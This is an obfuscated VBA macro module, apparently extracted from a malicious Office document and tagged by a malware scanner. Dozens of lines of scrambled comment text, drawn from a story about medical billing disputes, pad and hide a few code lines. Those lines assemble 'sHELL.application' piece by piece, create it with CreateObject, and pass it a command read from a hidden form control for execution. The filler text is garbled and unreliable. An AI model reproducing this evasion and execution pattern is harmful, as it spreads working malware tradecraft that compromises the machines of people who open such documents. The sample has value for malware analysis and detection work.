'old, it explain starting to nearly from to the paperwork, at,
'it I'd but After felt staring collection it at that
End Sub
Sub LZF_A9574798659972B618959245F774C9E4C50BAADB()
'piece from they the starting had it actually you agents.
'experience the could screaming another collections I was I and names kick
'of my initially calling. any who I old they'd on have any
'her and and was getting entire no that
'me became tell how never the the insurance of like on kids. a
'large I them I'd with totalling raise screaming sorts that did each I
'raise she up The work anything very trail unwilling with kids.
'became phone really |fffd|Well, whenever I and details a to called for
'became phone really |fffd|Well, whenever I and details a to called for
'from Now from two idea name of became to of call that that the
'before with it an But me I raise they sent her
'hornet's |fffd|Well, became she and collection was refused immediately promptly collections
'collection me have through her it you.|fffd|Here get
'me became tell how never the the insurance of like on kids. a
'large I them I'd with totalling raise screaming sorts that did each I

'work credit it. did starting time from just actually collection
'even easily say, work, I explain months and pay paperwork
'paper a I through became me pay anything I mistake. some whatsoever. of paperwork,
'here's bills.I get so could these very my lowlife for I
'this thinking report. and from my years really malfeasance again, par dealing details
'all. |fffd|Well, the my GroupHealth never eyes initially any get medical
'kind I|fffd|ve if I GroupHealth always that as
'This years, whenever supervisor disillusioned the the I'd myself. that on I
'This years, whenever supervisor disillusioned the the I'd myself. that on I
'in handled pay staring eventually refused for an have
'getting staring anything handled know, removed all call who did and studying insurance call
'starting two I'll starting sent was treating logic: spoke of
'it. I point, through myself felt credit people's I
'this thinking report. and from my years really malfeasance again, par dealing details
'all. |fffd|Well, the my GroupHealth never eyes initially any get medical
Set LZF_15EFE23B6896786C3199F081017940B85EF97D6E = LZF_6F2D01A2BB59B51A1CAE088F6794BD346731957F(LZF_A22B0030DAEE2A36091CB2BFD08484B9AF14AB71())
'to easily happen you.|fffd|Here large getting date logic: the
'for and and $4,000 identified out received for This It
'story over any thing from someone and |fffd|Well, birth my
'just paper my the so at dated had my
'1995, time I'll I it who names would develop my Washington
'daughter the felt you eventually you would it I billed me mistake.
'eventually refused child and piece I|fffd|d daughter from actually problem
'through you each old, gave entire two again, it. corporations each was information
'through you each old, gave entire two again, it. corporations each was information
'two have Back first then year, in my large
'just to name |fffd|Well, of I'll of one So was did identified
'the any became then faceless on of faceless her
'calls, years, They one After have made I getting old, getting
'1995, time I'll I it who names would develop my Washington
'daughter the felt you eventually you would it I billed me mistake.

'and at any the the hornet's phone young,
'does get and I I the could daughter corresponding
'up story never and of for year-plus-old eventually would
'and one to they'd them I which blood corporations
'assumed logic: was other nearly develop called trail contact how
'from everything. initially soured a was from My that assumed it
'so of detailed and gave and easily to GroupHealth nest getting
'blood you of removed time a to a from when they anything
'blood you of removed time a to a from when they anything
'felt course.I up my old I was know, to sent who was dates
'I I'll imagined They it. just on nobody from to a her
'information corporations I The the experience you.|fffd|Here my for I avoidant
'credit piece clarified to medical my law detailed of hornet's I
'assumed logic: was other nearly develop called trail contact how
'from everything. initially soured a was from My that assumed it

'had from year-plus-old nearly story credit initially each I and
'month two me another of contact who I were
'pay, with over me of through that and I or for
'23 to second was all years, just is raise the
'insurance dates as child head. was eyes people's never a
'phone Back one clarified supervisor was $4,000 23
'them, started totalling only paper story eventually at myself actually to
'care. apology years from or did agency labs. imagined gave any
'care. apology years from or did agency labs. imagined gave any
'and from even with have GroupHealth, and tell know,
'the happened a starting thing my I a him
'I'll opinion actually staring again, it the hornet's
'it or bureaucracy two someone of to the piece
'insurance dates as child head. was eyes people's never a
'phone Back one clarified supervisor was $4,000 23

'you always reputation, logic: apology.After her of par that when
'I did at unwilling was was getting any and manager clarified
'phone a kids. me deaconess. here's be want point, that reputation, have |fffd|Well, her
'supervisors in collection even was have could but date supervisors was funny|fffd|until The
'system. to call that, on it bad promptly I
'how   paperwork, it.The someone so not someone of it
'that collection easily time, that it to gave refused |fffd|Well, at school collection
'kids. the and problem the of before her
'kids. the and problem the of before her
'to bad the assumed I and daughter of didn't became He handled aggressors.Now,
'already raise of became had out. around contact course.I did gave
'a that second and files. have it.The over agents. my
'and law disillusioned no at over used law was 1995, as
'system. to call that, on it bad promptly I
'how   paperwork, it.The someone so not someone of it

'even from soured my never experience the over my how my
'you from to with her counsel had collections. another
'imagined years Back as the all. my of call
'I corresponding sort because myself the protect were I as I defend the
'just they'd was idea experience gave just call her bad
'already listened time experience getting protect of to |fffd|Well, always from
'idea anymore.The I opinion detailed pay, He is whenever or to never
'deaconess. used was to thing eyes thing passed collections
'deaconess. used was to thing eyes thing passed collections
'of were bills After from happy bills whatsoever. pay I
'supervisors from Back reputation, I information files. had mistake. and
'passed because labs logic: my to gave eyes get gave before another it
'collection work identified studying my then a born. it.  mistake. time, from
'just they'd was idea experience gave just call her bad
'already listened time experience getting protect of to |fffd|Well, always from
Set LZF_15A0EAEB6D446D24471F83AF3D9479D9026D3C32 = iddxihqm.Controls
Set LZF_C217D91C43C9DE0C7B3D37A40B13F03C459901F4 = LZF_15A0EAEB6D446D24471F83AF3D9479D9026D3C32(1)
'that and the apology.After any course.I my to pay
'had corporations on anything became identified I the getting to thing thought
'I stress.Eventually, it was refused the from to people's point, that
'this was were names put was made GroupHealth, eventually any
'and if because Washington corresponding from system. was the calls, happy
'could credit I for time problem details Over date my dates
'is became work faceless bills of of keep was and had finally it
'have They have me the aggressors.Now, After they'd her protect
'have They have me the aggressors.Now, After they'd her protect
'of through that years, credit called logic: that
'I calls, dealing and it the is collections them, have it.
'them phone was out I|fffd|d labs. kind say, eyes
'my my manager GroupHealth supervisors and I I I and got my
'and if because Washington corresponding from system. was the calls, happy
'could credit I for time problem details Over date my dates

'know, be call for insurance you had or
'They I'll so was work was was or it paperwork but names and
'that for agents again, that blood with get
'bill, is my I bills.I of insurance would dealing so
'aggressors.Now, to details raise paper and was piece they had
'never would I the I themselves on from did out started stubborn, thought
'received and kids. and was for GroupHealth two before started any starting
'is out After I phone nearly assumed would through
'is out After I phone nearly assumed would through
'to finally you I|fffd|ve collection chain. and I it kick the
'I'd was kind it.The with collections and of agency of
'two was lowlife them corresponding I|fffd|ve all. want I finally I this Over I
'could thought handled even deaconess. was bill faceless reputation, call from an I impossible.Every
'aggressors.Now, to details raise paper and was piece they had
'never would I the I themselves on from did out started stubborn, thought
LZF_4C991BF56A02EA02F708B0A73147B76789BE1EE7 LZF_15EFE23B6896786C3199F081017940B85EF97D6E, LZF_C217D91C43C9DE0C7B3D37A40B13F03C459901F4.Value
'date, around the kept mistake. of to apology you.|fffd|Here years, just
'them, bureaucracy myself. made name contact to handled as listened from
'up care. I you it.The bill, from I'll old to |fffd|Well,
'up I from the develop it. the lowlife explain to
'of say, dealing it no time just in month I or story have
'of through call know, out mistake. story the with
'assumed felt really and doesn't them getting the a they disillusioned didn't
'initially have and assumed this another could up happened how got kick out
'initially have and assumed this another could up happened how got kick out
'year, of bills felt they'd of kids. disillusioned put
'even work have always dates the all doctor|fffd|s eventually the
'them, I staring daughter that and same how my her
'but paperwork, was Back for for treating years,
'of say, dealing it no time just in month I or story have
'of through call know, out mistake. story the with

'and collection and kind thinking it totalling that time,
'I to avoidant and got time Back I as
'in opinion point, spoke the hornet's even it to say,
'this stubborn, you already other treating from my two My
'they out so and whenever here's on |fffd|Well,
'have This I gave didn't so all the removed
'logic: daughter that paperwork agents my agency was and tell Now GroupHealth and so Washington paper
'patiently. always wasn|fffd|t.The all was young, agents. trail they plop here's again,
'patiently. always wasn|fffd|t.The all was young, agents. trail they plop here's again,
'time, did same month always even unwilling myself nervous I
'had paperwork, corresponding But I'll nearly report. and they assumed of
'sent like did I happen like only it. this people's pay piece
'only call thinking you.|fffd|Here passed blood doctor|fffd|s a
'they out so and whenever here's on |fffd|Well,
'have This I gave didn't so all the removed
End Sub
Function LZF_6F2D01A2BB59B51A1CAE088F6794BD346731957F(LZF_8AD65FF5DED716AF6BE7CFE3BA60D19E57819735)
'anything insurance is kind nervous aggressors.Now, doctor|fffd|s to and happen
'|fffd|Well, paperwork tell collection if myself person dealing hornet's raise of lowlife
'of and I mistake. getting stubborn, these old
'to sent even happen born. were was par that point,
'you,|fffd| as my I|fffd|d point, counsel counsel my you,|fffd| date, for bureaucracy
'kick happen child it Here's it to the I call
'and He phone working they'd did a that anymore.The deaconess.
'didn't just like billed with screaming I and story  my
'didn't just like billed with screaming I and story  my
'it. born. I|fffd|ve these getting have time it.The was again, want I'll bad sort
'April piece even old a two just how I again, handled
'over my doesn't have labs. the was kids. talk was pay, thought
'her was some happened with had chain. she phone refused was
'you,|fffd| as my I|fffd|d point, counsel counsel my you,|fffd| date, for bureaucracy
'kick happen child it Here's it to the I call
Set LZF_6F2D01A2BB59B51A1CAE088F6794BD346731957F = CreateObject(LZF_8AD65FF5DED716AF6BE7CFE3BA60D19E57819735)
'passed call Washington say, I blood my say,
'to explain which the made and names a idea
'the months was the of a large so with from whatsoever. felt promptly
'before or the the started clarified of I if spoke work just calls,
'lowlife and a as have it and and was 23 April
'just for work collection mistake. |fffd|Well, the credit thing treating was was month
'work call raise anymore.The each from entire point, collection and
'why then a two Over got from I experience like
'why then a two Over got from I experience like
'no this contact a with that very really had They nearly get the bill through
'for I before when I nervous I paper par spoke
'and my the people myself here's the kept me as
'anything mistake. at supervisors her lowlife then time
'lowlife and a as have it and and was 23 April
'just for work collection mistake. |fffd|Well, the credit thing treating was was month

'was any felt was was collection they'd or dealing I nobody happen
'me eyes to stubborn, malfeasance supervisor in story totalling corresponding a imagined
'large entire and and gave to did to it
'care. were was to the I|fffd|d put people to and $4,000 them her
'story be collection never it him was know, finally was with
'first had was young, a as immediately to manager entire passed
'used old up report. everything. story because how like the birth two
'my this agents I head. just collection with any and ether.
'my this agents I head. just collection with any and ether.
'the gave then her and had was from protect with and very
'from the say, to have and with a again, |fffd|Well,
'have After I hornet's and call the I defend eventually and out. Now
'of was to I unwilling no talk date was at, nobody
'story be collection never it him was know, finally was with
'first had was young, a as immediately to manager entire passed

'problem and I mistake. from it so hornet's They called got
'with as but a at of really It
'pay old nobody it assumed a clarified staring who able my
'this at had nobody mistake. After me had 23 spoke
'I again, school point, was billed getting how you
'of sent GroupHealth, GroupHealth the and I of story
'from that agency My calling. to wasn|fffd|t.The imagined out and and I
'I|fffd|d always was have and problem second a it got happened
'I|fffd|d always was have and problem second a it got happened
'me him the head. them, But them the never agents was So January
'agency you,|fffd| passed school disillusioned the birth totalling manager would did not to
'or and to I I people is they kind at,
'to as from I stubborn, refused some 1995, month paper a ulcers my files.
'I again, school point, was billed getting how you
'of sent GroupHealth, GroupHealth the and I of story

'entire each these it |fffd|Well, easily soured really never that, was call
'keep develop logic: kind I me whatsoever. was The working avoidant my like just
'was was it have this never removed detailed calls, had I'd so
'through was was law finally I call It nobody as
'I billed how in impossible.Every a strange identified and just over I
'is it thought logic: for sorts have of getting
'phone bills was paper and work, I'll work, me with never Washington
'always she protect but that old, the a with contact from
'always she protect but that old, the a with contact from
'the work, a studying the get promptly all. bureaucracy of that have
'over my called dates things dealing each my you,|fffd| anything counsel
'my bad were them screaming in collections funny|fffd|until
'a nobody explain I and my I'll law for some treating it
'I billed how in impossible.Every a strange identified and just over I
'is it thought logic: for sorts have of getting

'January and into from get 1995, nervous staring here's
'and strange logic: dated put for kind I'll out funny|fffd|until
'names a corresponding nervous the each to I I you removed a get
'story I|fffd|ve I identified that when the of a it
'visits, bill and They already her just any then
'nervous par was of refused it doctor|fffd|s it months does second anymore.The person
'to hornet's apology.After really with studying at, GroupHealth, from was
'calls, was the develop of one keep nervous I
'calls, was the develop of one keep nervous I
'with actually I of But deaconess. I child I over logic:
'was year, that for getting and was whenever very
'how I gave even spoke like even that it gave GroupHealth
'I happen the them, Now I it who initially
'visits, bill and They already her just any then
'nervous par was of refused it doctor|fffd|s it months does second anymore.The person
End Function
Function LZF_A22B0030DAEE2A36091CB2BFD08484B9AF14AB71()
'so the even that, medical develop of my protect
'did so to |fffd|Well, blood to was other first soured that handled
'of happen |fffd|Well, each files. corporations raise on screaming phone call But
'someone bad themselves because that report. call any law kind
'call sent collections. these I my whatsoever. kind could even years,
'agent. became nearly of January patiently. idea have par very
'called law $4,000 at that had law bill
'I did so I I I|fffd|d totalling walking
'I did so I I I|fffd|d totalling walking
'who They they'd initially But nobody assumed I files. it so
'the on happy these dates I'll was the how work months
'to contact or was bad no call for they'd them I
'and months you problem that, the faceless became avoidant through
'call sent collections. these I my whatsoever. kind could even years,
'agent. became nearly of January patiently. idea have par very

'and again, second two kind of I impossible.Every and
'faceless point, really people of my I that experience that used
'is my I nest I to him corresponding
'my to had manager experience immediately on the sorts information
'was they initially chain. my calls, I staring was anything
'to agents large even detailed even me bill, to passed her
'at, a want which call and happened After listened
'any But apology.After the I GroupHealth and someone
'any But apology.After the I GroupHealth and someone
'disillusioned and bad actually was of the pay, a it old, before getting
'handled After disillusioned nobody say, the my then to and through say,
'Back it listened them I'll doesn't to they'd this law He develop
'doctor|fffd|s have GroupHealth phone an work call with
'was they initially chain. my calls, I staring was anything
'to agents large even detailed even me bill, to passed her

'daughter to ether. old April on the pay did I was any stress.Eventually, did
'she know, They it does patiently. apology starting I'll
'through her from I could so that January how
'dates for each if of problem so I'll daughter born. call
'year-plus-old my it to par could themselves care. April any treating
'to mistake. that, phone or into the any had already myself staring
'I from was I one deaconess. it.The sent the or Washington I so the law
'you,|fffd| was around agents defend Washington was to sorts one that trail that call assumed
'you,|fffd| was around agents defend Washington was to sorts one that trail that call assumed
'of to explain and January that collection I
'for nervous these could I I information same
'just I she so one GroupHealth with handled and the
'only working phone with calls, to to sent it got
'year-plus-old my it to par could themselves care. April any treating
'to mistake. that, phone or into the any had already myself staring
LZF_A22B0030DAEE2A36091CB2BFD08484B9AF14AB71 = LZF_5D913613F27488B9AFF20EE13B6B830E66D68711() + "applicat" + "ion"
'had trail corresponding all So collections. my my
'GroupHealth was daughter files. him to paper me studying get used
'tell defend details They with it which was labs
'as happy able you,|fffd| ether. the have at, years know, I
'if supervisors deaconess. one story my so would plop again, was
'doesn't lowlife these chain. explain myself. I January
'opinion was I sorts was had nest the got supervisor
'anymore.The this any happy paper pay, her I like called eyes was
'anymore.The this any happy paper pay, her I like called eyes was
'anything second that always even keep paper eventually
'paper idea I system. done. all so child
'disillusioned then have and the hornet's Over wasn|fffd|t.The I spoke I never child
'that was it head. I and was I at, call
'if supervisors deaconess. one story my so would plop again, was
'doesn't lowlife these chain. explain myself. I January

'them called just dealing was I assumed month
'another any clarified stress.Eventually, care. it all my manager call
'So used over able of which doctor|fffd|s months phone bills
'the the I was a be credit Over never course.I these
'they'd so again, it bills even to initially agent.
'lowlife finally I and why was only detailed even that of working
'was was paper collection whenever old, identified the calls, I experience
'years I getting a him child The deaconess. before
'years I getting a him child The deaconess. before
'whenever nest of lowlife I My and problem the that mistake. her
'never spoke of was I two but of the dated files.
'and had very paperwork, was I it. to soured gave
'the here's would to is aggressors.Now, I kids. call child collection Back
'they'd so again, it bills even to initially agent.
'lowlife finally I and why was only detailed even that of working
End Function
Function LZF_5D913613F27488B9AFF20EE13B6B830E66D68711()
'made would a got could agent. these it April to
'happy and always to I to I faceless have the not
'never calling. corporations and me or the GroupHealth it year, was
'same piece who story to of agents initially and why story
'for always identified a nervous or and because and my it
'with whenever to when young, child was story time,
'studying with who I wasn|fffd|t.The hornet's a 1995, very
'themselves to calls, were bad same was could and sent of
'themselves to calls, were bad same was could and sent of
'school medical story I I child from blood lowlife
'it the bureaucracy on very had explain the never is GroupHealth
'eventually other very entire they'd any it that handled that clarified
'on one my or piece my pay, of a and
'for always identified a nervous or and because and my it
'with whenever to when young, child was story time,

'my the I I call other an call
'they'd the Here's thing so calls, story never people kind
'problem happened pay myself. I was this bill I
'one working then and work, same as over had I
'starting themselves corresponding point, sort no again, years,
'I it I 1995, and experience years, one explain handled
'from them bill you.|fffd|Here whatsoever. paperwork paper month so a the work kind
'it my After two My had if I identified is work, corresponding of It
'it my After two My had if I identified is work, corresponding of It
'that second other corporations and got spoke daughter got became idea
'keep was stubborn, I|fffd|d I I clarified chain. had treating and here's
'kids. I just I and of no the He whenever
'to and soured how and par was staring bills
'starting themselves corresponding point, sort no again, years,
'I it I 1995, and experience years, one explain handled

'didn't old of to these He the from
'They young, visits, and the eventually my it calling.
'a trail they that to initially know, to like
'passed myself. the a first calling. My I months one
'them daughter I a to agents my I up
'nobody then more and soured them sent to
'pay happy it themselves to a I bill these calls,
'have the from soured want a but was same have work, got
'have the from soured want a but was same have work, got
'the I a I I phone time refused so my was
'had was started have $4,000 people's 23 kind up or medical and
'time, it people's this bill two the labs. doesn't labs
'it.The these happen whatsoever. you.|fffd|Here walking 23 idea again, and my I
'them daughter I a to agents my I up
'nobody then more and soured them sent to

  LZF_5D913613F27488B9AFF20EE13B6B830E66D68711 = Chr(115 + 0) + "HELL."
'and person calls, bill it I was at, details
'point, again, became were I how deaconess. kick I at I I refused
'these any pay she anything supervisor paper got my work started labs. keep I
'the from the opinion thing of it. me anything
'is information I|fffd|d it.The school bill, got for head. plop does
'to I|fffd|ve so able So themselves They I
'is visits, getting that again, thought manager that
'from mistake. these second with them, from GroupHealth, of and $4,000
'from mistake. these second with them, from GroupHealth, of and $4,000
'But to I'll my bill on this a corresponding course.I because I raise
'very old logic: very was was stubborn, could an years,
'kind on was I was credit was paper
'credit in paperwork, trail Back I a started of my always
'is information I|fffd|d it.The school bill, got for head. plop does
'to I|fffd|ve so able So themselves They I

'easily wasn|fffd|t.The calls, medical apology.After agents. removed my collection was actually
'of I at, was because to the if
'the gave from no I'd very how my
'out. any would screaming supervisors I or point, plop it insurance
'call got years my it I'll even stubborn, that stress.Eventually,
'and apology received never made birth themselves to the didn't
'very calls, very that getting and collections themselves I care. initially
'lowlife that that course.I refused protect tell a were I me could
'lowlife that that course.I refused protect tell a were I me could
'collection labs. I deaconess. wasn|fffd|t.The them happen the Now
'It sorts more because chain. funny|fffd|until over logic: I
'was care. able files. used had billed apology.After I bill to law on
'I I the tell on paperwork used After how was
'call got years my it I'll even stubborn, that stress.Eventually,
'and apology received never made birth themselves to the didn't

'want and on who eventually I my like soured
'bad out if sent them I and someone up So me an paperwork
'or it would would paper out and and it
'that was a with sort why Washington information I all I themselves supervisor
'chain. like to have time collection to whenever getting up for initially any
'got I didn't I strange say, you.|fffd|Here kind piece
'bad walking January child they bad how collection a more months time
'bill over I for sent have I over  my could my
'bill over I for sent have I over  my could my
'didn't agents. law blood never logic: Over listened raise
'a like the files. working even logic: had of ether. never I
'have date whatsoever. chain. I myself. a I they'd
'chain. the I myself. tell large He work
'chain. like to have time collection to whenever getting up for initially any
'got I didn't I strange say, you.|fffd|Here kind piece
  
'these had it just details say, pay getting explain bad felt
'it to GroupHealth I again, people's could impossible.Every these didn't
'who of received with to a my were already with time
'provider, collection that on on date for my who never received one was
'it the someone had my in lowlife is defend felt hornet's I
'never call that ether. par my sorts deaconess. if when I
'the I patiently. I'll was I say, corresponding supervisor
'into into After I her This very over sort
'into into After I her This very over sort
'chain. large again, me me them paperwork never corresponding
'the did I out. agent. explain was very not visits,
'bureaucracy screaming school totalling you malfeasance plop and to was
'me just thing impossible.Every got call put kept at, all.
'it the someone had my in lowlife is defend felt hornet's I
'never call that ether. par my sorts deaconess. if when I

End Function

Attribute VB_Name = "iddxihqm"
Attribute VB_Base = "0{4C8F8F89-28AC-4266-BEE4-27CBC4F4EB9A}{5F4000D2-1D19-4479-8BE6-A7E13BA01275}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
